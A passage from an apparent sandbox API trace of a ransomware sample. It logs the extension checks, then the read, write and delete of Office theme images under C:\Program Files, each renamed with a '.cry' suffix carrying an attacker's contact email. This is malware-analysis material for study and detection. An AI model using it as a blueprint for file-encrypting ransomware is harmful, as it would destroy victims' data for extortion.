(lpString=".7z") returned 3 [0045.656] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.656] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0045.656] lstrlenW (lpString=".dbf") returned 4 [0045.656] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.656] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0045.656] lstrlenW (lpString=".1cd") returned 4 [0045.656] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.656] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0045.656] lstrlenW (lpString=".jpg") returned 4 [0045.657] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.657] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0045.657] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.657] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0045.657] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1593) returned 1 [0045.657] CloseHandle (hObject=0x1bc) returned 1 [0045.657] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif")) returned 0x20 [0045.657] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.658] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0045.658] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.658] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.658] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0045.686] GetLastError () returned 0x0 [0045.686] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x639, lpOverlapped=0x0) returned 1 [0045.695] WriteFile (in: hFile=0x204, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x640, lpOverlapped=0x0) returned 1 [0045.695] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.695] WriteFile (in: hFile=0x204, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.695] SetEndOfFile (hFile=0x204) returned 1 [0045.696] CloseHandle (hObject=0x204) returned 1 [0045.696] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.696] SetEndOfFile (hFile=0x1bc) returned 1 [0045.696] CloseHandle (hObject=0x1bc) returned 1 [0045.696] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.697] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif")) returned 1 [0045.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0045.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0045.697] lstrlenW (lpString=".doc") returned 4 [0045.697] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.697] lstrlenW (lpString=".docx") returned 5 [0045.697] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.697] lstrlenW (lpString=".pdf") returned 4 [0045.697] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.697] lstrlenW (lpString=".xls") returned 4 [0045.697] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.697] lstrlenW (lpString=".xlsx") returned 5 [0045.697] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.697] lstrlenW (lpString=".ppt") returned 4 [0045.697] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0045.697] lstrlenW (lpString=".zip") returned 4 [0045.697] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.697] lstrlenW (lpString=".rar") returned 4 [0045.697] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.697] lstrlenW (lpString=".bz2") returned 4 [0045.697] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.697] lstrlenW (lpString=".7z") returned 3 [0045.697] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0045.698] lstrlenW (lpString=".dbf") returned 4 [0045.698] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0045.698] lstrlenW (lpString=".1cd") returned 4 [0045.698] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0045.698] lstrlenW (lpString=".jpg") returned 4 [0045.698] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0045.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0045.698] lstrlenW (lpString=".doc") returned 4 [0045.698] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.698] lstrlenW (lpString=".docx") returned 5 [0045.698] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.698] lstrlenW (lpString=".pdf") returned 4 [0045.698] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.698] lstrlenW (lpString=".xls") returned 4 [0045.698] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.698] lstrlenW (lpString=".xlsx") returned 5 [0045.698] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.698] lstrlenW (lpString=".ppt") returned 4 [0045.698] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0045.698] lstrlenW (lpString=".zip") returned 4 [0045.698] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.698] lstrlenW (lpString=".rar") returned 4 [0045.698] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.698] lstrlenW (lpString=".bz2") returned 4 [0045.698] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.698] lstrlenW (lpString=".7z") returned 3 [0045.698] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0045.698] lstrlenW (lpString=".dbf") returned 4 [0045.698] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0045.698] lstrlenW (lpString=".1cd") returned 4 [0045.698] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0045.699] lstrlenW (lpString=".jpg") returned 4 [0045.699] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.699] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0045.699] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.699] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0045.699] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=16738) returned 1 [0045.699] CloseHandle (hObject=0x1bc) returned 1 [0045.699] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png")) returned 0x20 [0045.699] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.699] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0045.699] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.699] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.699] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0045.701] GetLastError () returned 0x0 [0045.701] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x4162, lpOverlapped=0x0) returned 1 [0045.702] WriteFile (in: hFile=0x204, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x4170, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x4170, lpOverlapped=0x0) returned 1 [0045.703] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.703] WriteFile (in: hFile=0x204, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.704] SetEndOfFile (hFile=0x204) returned 1 [0045.704] CloseHandle (hObject=0x204) returned 1 [0045.704] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.704] SetEndOfFile (hFile=0x1bc) returned 1 [0045.705] CloseHandle (hObject=0x1bc) returned 1 [0045.705] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.705] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png")) returned 1 [0045.705] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0045.705] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0045.705] lstrlenW (lpString=".doc") returned 4 [0045.705] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.705] lstrlenW (lpString=".docx") returned 5 [0045.705] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.705] lstrlenW (lpString=".pdf") returned 4 [0045.705] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.705] lstrlenW (lpString=".xls") returned 4 [0045.706] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.706] lstrlenW (lpString=".xlsx") returned 5 [0045.706] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.706] lstrlenW (lpString=".ppt") returned 4 [0045.706] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.706] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0045.706] lstrlenW (lpString=".zip") returned 4 [0045.706] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.706] lstrlenW (lpString=".rar") returned 4 [0045.706] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.706] lstrlenW (lpString=".bz2") returned 4 [0045.706] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.706] lstrlenW (lpString=".7z") returned 3 [0045.706] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.706] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0045.706] lstrlenW (lpString=".dbf") returned 4 [0045.706] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.706] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0045.706] lstrlenW (lpString=".1cd") returned 4 [0045.706] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.706] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0045.706] lstrlenW (lpString=".jpg") returned 4 [0045.706] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.706] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0045.706] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0045.706] lstrlenW (lpString=".doc") returned 4 [0045.706] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.706] lstrlenW (lpString=".docx") returned 5 [0045.706] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.706] lstrlenW (lpString=".pdf") returned 4 [0045.706] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.706] lstrlenW (lpString=".xls") returned 4 [0045.706] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.706] lstrlenW (lpString=".xlsx") returned 5 [0045.706] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.706] lstrlenW (lpString=".ppt") returned 4 [0045.706] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.706] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0045.707] lstrlenW (lpString=".zip") returned 4 [0045.707] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.707] lstrlenW (lpString=".rar") returned 4 [0045.707] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.707] lstrlenW (lpString=".bz2") returned 4 [0045.707] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.707] lstrlenW (lpString=".7z") returned 3 [0045.707] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0045.707] lstrlenW (lpString=".dbf") returned 4 [0045.707] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0045.707] lstrlenW (lpString=".1cd") returned 4 [0045.707] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0045.707] lstrlenW (lpString=".jpg") returned 4 [0045.707] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.707] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0045.707] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.707] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0045.707] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1439) returned 1 [0045.707] CloseHandle (hObject=0x1bc) returned 1 [0045.707] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif")) returned 0x20 [0045.708] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.708] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0045.708] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.708] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.708] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0045.709] GetLastError () returned 0x0 [0045.709] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x59f, lpOverlapped=0x0) returned 1 [0047.000] WriteFile (in: hFile=0x204, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x5a0, lpOverlapped=0x0) returned 1 [0047.001] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.001] WriteFile (in: hFile=0x204, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.001] SetEndOfFile (hFile=0x204) returned 1 [0047.001] CloseHandle (hObject=0x204) returned 1 [0047.002] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.002] SetEndOfFile (hFile=0x1bc) returned 1 [0047.002] CloseHandle (hObject=0x1bc) returned 1 [0047.002] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0047.003] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif")) returned 1 [0047.003] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.003] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.003] lstrlenW (lpString=".doc") returned 4 [0047.003] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.003] lstrlenW (lpString=".docx") returned 5 [0047.003] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.003] lstrlenW (lpString=".pdf") returned 4 [0047.003] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.003] lstrlenW (lpString=".xls") returned 4 [0047.003] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.003] lstrlenW (lpString=".xlsx") returned 5 [0047.003] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.003] lstrlenW (lpString=".ppt") returned 4 [0047.003] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.003] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.003] lstrlenW (lpString=".zip") returned 4 [0047.003] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.003] lstrlenW (lpString=".rar") returned 4 [0047.003] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.003] lstrlenW (lpString=".bz2") returned 4 [0047.003] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.003] lstrlenW (lpString=".7z") returned 3 [0047.003] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.003] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.003] lstrlenW (lpString=".dbf") returned 4 [0047.003] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.004] lstrlenW (lpString=".1cd") returned 4 [0047.004] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.004] lstrlenW (lpString=".jpg") returned 4 [0047.004] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.004] lstrlenW (lpString=".doc") returned 4 [0047.004] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.004] lstrlenW (lpString=".docx") returned 5 [0047.004] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.004] lstrlenW (lpString=".pdf") returned 4 [0047.004] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.004] lstrlenW (lpString=".xls") returned 4 [0047.004] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.004] lstrlenW (lpString=".xlsx") returned 5 [0047.004] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.004] lstrlenW (lpString=".ppt") returned 4 [0047.004] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.004] lstrlenW (lpString=".zip") returned 4 [0047.004] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.004] lstrlenW (lpString=".rar") returned 4 [0047.004] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.004] lstrlenW (lpString=".bz2") returned 4 [0047.004] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.004] lstrlenW 